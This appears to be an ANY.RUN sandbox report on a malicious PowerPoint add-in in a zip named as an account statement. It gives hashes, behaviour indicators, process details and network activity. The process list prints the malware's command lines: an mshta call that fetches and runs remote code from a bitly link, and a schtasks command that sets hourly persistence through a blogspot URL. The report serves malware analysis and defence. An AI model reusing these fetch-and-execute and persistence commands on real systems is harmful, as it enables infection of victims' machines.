analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Statement of account_2021.ppa.zip

Full analysis: https://app.any.run/tasks/0e06b891-8f78-4a19-9e79-1ce79d7309f9
Verdict: Malicious activity
Analysis date: January 24, 2022, 21:04:24
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

A879DC616FBB2306BEA5FF75E0DBB9E0

SHA1:

0B5783662C3706C94D31DD89DB41344114E74A87

SHA256:

50D24C93FFD809D097C2ADC221A1D11C76A9678048E99228E2C58552306D0B70

SSDEEP:

384:7PcGxBjf6AST1kUjDvMxdqiRa8ZxlZB0AWUD2:7PPxBjSXT1jUNaUBLvD2

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • POWERPNT.EXE (PID: 2784)
    • Unusual execution from Microsoft Office

      • POWERPNT.EXE (PID: 2784)
    • Changes settings of System certificates

      • mshta.exe (PID: 2960)
      • mshta.exe (PID: 4092)
      • mshta.exe (PID: 1996)
    • Changes the autorun value in the registry

      • mshta.exe (PID: 2960)
      • mshta.exe (PID: 4092)
      • mshta.exe (PID: 1996)
    • Uses Task Scheduler to run other applications

      • mshta.exe (PID: 2960)
      • mshta.exe (PID: 4092)
      • mshta.exe (PID: 1996)
    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 3692)
      • schtasks.exe (PID: 3848)
      • schtasks.exe (PID: 1852)
  • SUSPICIOUS

    • Reads the computer name

      • WinRAR.exe (PID: 3420)
      • mshta.exe (PID: 2960)
      • mshta.exe (PID: 4092)
      • mshta.exe (PID: 1996)
    • Checks supported languages

      • WinRAR.exe (PID: 3420)
      • mshta.exe (PID: 2960)
      • cmd.exe (PID: 2280)
      • mshta.exe (PID: 4092)
      • mshta.exe (PID: 1996)
    • Reads Microsoft Outlook installation path

      • mshta.exe (PID: 2960)
      • mshta.exe (PID: 4092)
      • mshta.exe (PID: 1996)
    • Creates files in the user directory

      • mshta.exe (PID: 2960)
    • Adds / modifies Windows certificates

      • mshta.exe (PID: 2960)
      • mshta.exe (PID: 4092)
      • mshta.exe (PID: 1996)
    • Modifies files in Chrome extension folder

      • chrome.exe (PID: 1468)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • cmd.exe (PID: 2280)
  • INFO

    • Checks supported languages

      • POWERPNT.EXE (PID: 2784)
      • schtasks.exe (PID: 3692)
      • chrome.exe (PID: 1468)
      • chrome.exe (PID: 1248)
      • chrome.exe (PID: 288)
      • chrome.exe (PID: 2500)
      • chrome.exe (PID: 2088)
      • chrome.exe (PID: 1644)
      • chrome.exe (PID: 2832)
      • chrome.exe (PID: 2704)
      • chrome.exe (PID: 3212)
      • chrome.exe (PID: 3680)
      • chrome.exe (PID: 1696)
      • chrome.exe (PID: 2428)
      • chrome.exe (PID: 1444)
      • chrome.exe (PID: 2400)
      • chrome.exe (PID: 2548)
      • chrome.exe (PID: 1532)
      • chrome.exe (PID: 3952)
      • chrome.exe (PID: 2156)
      • schtasks.exe (PID: 3848)
      • chrome.exe (PID: 2924)
      • chrome.exe (PID: 2932)
      • chrome.exe (PID: 596)
      • chrome.exe (PID: 2748)
      • schtasks.exe (PID: 1852)
    • Manual execution by user

      • POWERPNT.EXE (PID: 2784)
      • chrome.exe (PID: 1468)
      • cmd.exe (PID: 2280)
    • Reads Microsoft Office registry keys

      • POWERPNT.EXE (PID: 2784)
    • Reads the computer name

      • POWERPNT.EXE (PID: 2784)
      • chrome.exe (PID: 1468)
      • schtasks.exe (PID: 3692)
      • chrome.exe (PID: 1248)
      • chrome.exe (PID: 2088)
      • chrome.exe (PID: 2428)
      • chrome.exe (PID: 3212)
      • chrome.exe (PID: 1532)
      • chrome.exe (PID: 2156)
      • chrome.exe (PID: 2932)
      • schtasks.exe (PID: 3848)
      • chrome.exe (PID: 2924)
      • schtasks.exe (PID: 1852)
    • Creates files in the user directory

      • POWERPNT.EXE (PID: 2784)
    • Reads settings of System Certificates

      • mshta.exe (PID: 2960)
      • chrome.exe (PID: 2088)
      • mshta.exe (PID: 4092)
      • mshta.exe (PID: 1996)
    • Checks Windows Trust Settings

      • mshta.exe (PID: 2960)
      • mshta.exe (PID: 4092)
      • mshta.exe (PID: 1996)
    • Reads internet explorer settings

      • mshta.exe (PID: 2960)
      • mshta.exe (PID: 4092)
      • mshta.exe (PID: 1996)
    • Reads the hosts file

      • chrome.exe (PID: 1468)
      • chrome.exe (PID: 2088)
    • Application launched itself

      • chrome.exe (PID: 1468)
    • Reads the date of Windows installation

      • chrome.exe (PID: 2924)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: Statement of account_2021.ppa
ZipUncompressedSize: 80896
ZipCompressedSize: 13413
ZipCRC: 0xe025902a
ZipModifyDate: 2022:01:24 21:03:09
ZipCompression: Deflated
ZipBitFlag: -
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
75
Monitored processes
31
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs powerpnt.exe no specs mshta.exe schtasks.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs cmd.exe no specs chrome.exe no specs mshta.exe schtasks.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs mshta.exe schtasks.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3420"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Statement of account_2021.ppa.zip"C:\Program Files\WinRAR\WinRAR.exeExplorer.EXE
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
2784"C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\admin\Desktop\Statement of account_2021.ppa"C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft PowerPoint
Exit code:
0
Version:
14.0.6009.1000
Modules
Images
c:\program files\microsoft office\office14\powerpnt.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\program files\microsoft office\office14\ppcore.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2960mshta http://bitly.com/tywuiqdbshagdjshadvghaC:\Windows\system32\mshta.exe
POWERPNT.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\lpk.dll
3692"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 60 /tn ""Bluefibxonashi"" /F /tr ""\""MsHtA""\""https://thankyouforeverythingeheheh.blogspot.com/p/gibson-1.html\""C:\Windows\System32\schtasks.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
1468"C:\Program Files\Google\Chrome\Application\chrome.exe" C:\Program Files\Google\Chrome\Application\chrome.exe
Explorer.EXE
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
86.0.4240.198
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\winmm.dll
c:\windows\system32\user32.dll
2500"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=86.0.4240.198 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x6e13d988,0x6e13d998,0x6e13d9a4C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
86.0.4240.198
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\shell32.dll
1248"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1036,5759949264890712376,3971781999358101168,131072 --enable-features=PasswordImport --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1068 /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
86.0.4240.198
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
2088"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1036,5759949264890712376,3971781999358101168,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1340 /prefetch:8C:\Program Files\Google\Chrome\Application\chrome.exe
chrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
86.0.4240.198
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome_elf.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\version.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\shell32.dll
288"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1036,5759949264890712376,3971781999358101168,131072 --enable-features=PasswordImport --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1820 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Version:
86.0.4240.198
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\shlwapi.dll
2832"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1036,5759949264890712376,3971781999358101168,131072 --enable-features=PasswordImport --lang=en-US --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1932 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
86.0.4240.198
Modules
Images
c:\windows\system32\ntdll.dll
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\shell32.dll
Total events
34 149
Read events
33 666
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
141
Text files
124
Unknown types
16

Dropped files

PID
Process
Filename
Type
2784POWERPNT.EXEC:\Users\admin\AppData\Local\Temp\CVR6C34.tmp.cvr
MD5:
SHA256:
2960mshta.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\X4OB0WW6.txttext
MD5:0D37B12FDD4B7449CD10261414294388
SHA256:394194516EAE0944B215AFAF6F52D8E37CC3DE4E232ED6F5900889A1CF0E88A8
2960mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_A70B016F15DC489095248B00F1A94BC5der
MD5:578A411A58258A4FAFF77EBF5A69CB55
SHA256:77F36444A25C9BFCCCAF347C0E3BB030C08CB8498E06748CCD6CB1BF46FBA150
2960mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\tywuiqdbshagdjshadvgha[1].htmhtml
MD5:A385AEDC5593AA858F44CC3599901934
SHA256:B5E9F5CFE2E7E004D4C8E2BC072814D167CAAB3342B370B2FA8A880A556A9500
2960mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBAder
MD5:64E9B8BB98E2303717538CE259BEC57D
SHA256:76BD459EC8E467EFC3E3FB94CB21B9C77A2AA73C9D4C0F3FAF823677BE756331
2784POWERPNT.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Statement of account_2021.ppa.LNKlnk
MD5:1BA4BAB3C3C093B3C13EADE49E161D67
SHA256:9C91820436488BD7A179B192CB2724830727A22B43864BEED5F17C217B1D63B7
2784POWERPNT.EXEC:\Users\admin\AppData\Local\Temp\~DF1CE7F203FB4FB975.TMPbinary
MD5:72F5C05B7EA8DD6059BF59F50B22DF33
SHA256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
2960mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_052EA9D27EE3F7FAB6BA5A547FF91AB9binary
MD5:B8C77432AD0057A2DE95841979974C09
SHA256:08CE5386E9EE1D3E73B9D547219B4901B4496C85319E125644653A0AF8AE0954
2960mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\gibson-78219hjez1[1].htmhtml
MD5:BD04F61786EE8602A99718F89EB81857
SHA256:5C439F638E26437A948F786356D65746E349B853C9D47DFE22318FDB9193EC8F
2784POWERPNT.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.datini
MD5:0B0C3A830A800172045D94C45DEEB86B
SHA256:0326C09B21147B00E15676C74DB96CA775649A1AD9AD34D104BCF2DEF0F8FA90
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
34
TCP/UDP connections
47
DNS requests
31
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2960
mshta.exe
GET
200
142.250.186.131:80
http://ocsp.pki.goog/gtsr1/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBQwkcLWD4LqGJ7bE7B1XZsEbmfwUAQU5K8rJnEaK0gnhS9SZizv8IkTcT4CDQIDvFNZazTHGPUBUGY%3D
US
der
724 b
whitelisted
876
svchost.exe
HEAD
200
74.125.108.167:80
http://r2---sn-2gb7sn7y.gvt1.com/edgedl/release2/chrome_component/adys6mm2sd23z36ns7e4hcs4hrqq_1.3.36.111/ihnlcenocehgdaegdmhbidjhnhdchfmm_1.3.36.111_win_ac5lwr5427en7czu7myxmee6c7xq.crx3?cms_redirect=yes&mh=8t&mip=45.86.202.16&mm=28&mn=sn-2gb7sn7y&ms=nvh&mt=1643058263&mv=m&mvi=2&pl=24&rmhost=r3---sn-2gb7sn7y.gvt1.com&shardbypass=yes
US
whitelisted
2960
mshta.exe
GET
200
142.250.186.131:80
http://ocsp.pki.goog/gts1c3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCEBBSdsRhkc8RCgAAAAEre9c%3D
US
der
471 b
whitelisted
2960
mshta.exe
GET
200
142.250.186.131:80
http://ocsp.pki.goog/gsr1/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6%2BMgGqMQQUYHtmGkUNl8qJUC99BM00qP%2F8%2FUsCEHe9DWzbNvka6iEPxPBY0w0%3D
US
der
1.41 Kb
whitelisted
876
svchost.exe
HEAD
403
34.104.35.123:80
http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adys6mm2sd23z36ns7e4hcs4hrqq_1.3.36.111/ihnlcenocehgdaegdmhbidjhnhdchfmm_1.3.36.111_win_ac5lwr5427en7czu7myxmee6c7xq.crx3
US
whitelisted
876
svchost.exe
HEAD
302
172.217.18.110:80
http://redirector.gvt1.com/edgedl/release2/chrome_component/adys6mm2sd23z36ns7e4hcs4hrqq_1.3.36.111/ihnlcenocehgdaegdmhbidjhnhdchfmm_1.3.36.111_win_ac5lwr5427en7czu7myxmee6c7xq.crx3
US
whitelisted
2960
mshta.exe
GET
200
142.250.186.131:80
http://ocsp.pki.goog/gts1c3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCEFs93LXfWb93CgAAAAErfco%3D
US
der
471 b
whitelisted
2960
mshta.exe
GET
301
67.199.248.14:80
http://bitly.com/tywuiqdbshagdjshadvgha
US
html
159 b
shared
2088
chrome.exe
GET
302
172.217.18.110:80
http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUwyMERESEZGVmJnQQ/1.0.0.6_nmmhkkegccagdldgiimedpiccmgmieda.crx
US
html
555 b
whitelisted
2088
chrome.exe
GET
200
172.217.130.72:80
http://r3---sn-2gb7sn7r.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUwyMERESEZGVmJnQQ/1.0.0.6_nmmhkkegccagdldgiimedpiccmgmieda.crx?cms_redirect=yes&mh=e_&mip=45.86.202.16&mm=28&mn=sn-2gb7sn7r&ms=nvh&mt=1643058263&mv=m&mvi=3&pl=24&shardbypass=yes&smhost=r3---sn-2gb7sn7s.gvt1.com
US
crx
242 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2088
chrome.exe
142.250.74.195:443
www.gstatic.com
Google Inc.
US
whitelisted
2960
mshta.exe
142.250.186.131:80
ocsp.pki.goog
Google Inc.
US
whitelisted
2960
mshta.exe
142.250.186.41:443
www.blogger.com
Google Inc.
US
unknown
2960
mshta.exe
216.58.212.169:443
resources.blogblog.com
Google Inc.
US
whitelisted
2088
chrome.exe
142.250.185.227:443
clientservices.googleapis.com
Google Inc.
US
whitelisted
2088
chrome.exe
142.250.185.106:443
fonts.googleapis.com
Google Inc.
US
whitelisted
2960
mshta.exe
67.199.248.14:80
bitly.com
Bitly Inc
US
shared
2088
chrome.exe
142.250.186.78:443
clients2.google.com
Google Inc.
US
whitelisted
2960
mshta.exe
142.250.184.193:443
dhjkasdhaksdbaksdhkasargya.blogspot.com
Google Inc.
US
whitelisted
2088
chrome.exe
142.250.185.100:443
www.google.com
Google Inc.
US
whitelisted

DNS requests

Domain
IP
Reputation
bitly.com
  • 67.199.248.14
  • 67.199.248.15
shared
dhjkasdhaksdbaksdhkasargya.blogspot.com
  • 142.250.184.193
whitelisted
ctldl.windowsupdate.com
  • 93.184.221.240
whitelisted
ocsp.pki.goog
  • 142.250.186.131
whitelisted
www.blogger.com
  • 142.250.186.41
  • 142.250.184.201
  • 142.250.181.233
shared
resources.blogblog.com
  • 216.58.212.169
  • 142.250.184.201
  • 142.250.181.233
whitelisted
clientservices.googleapis.com
  • 142.250.185.227
whitelisted
www.google.com
  • 142.250.185.100
whitelisted
clients2.google.com
  • 142.250.186.78
whitelisted
accounts.google.com
  • 142.250.186.45
shared

Threats

No threats detected
No debug info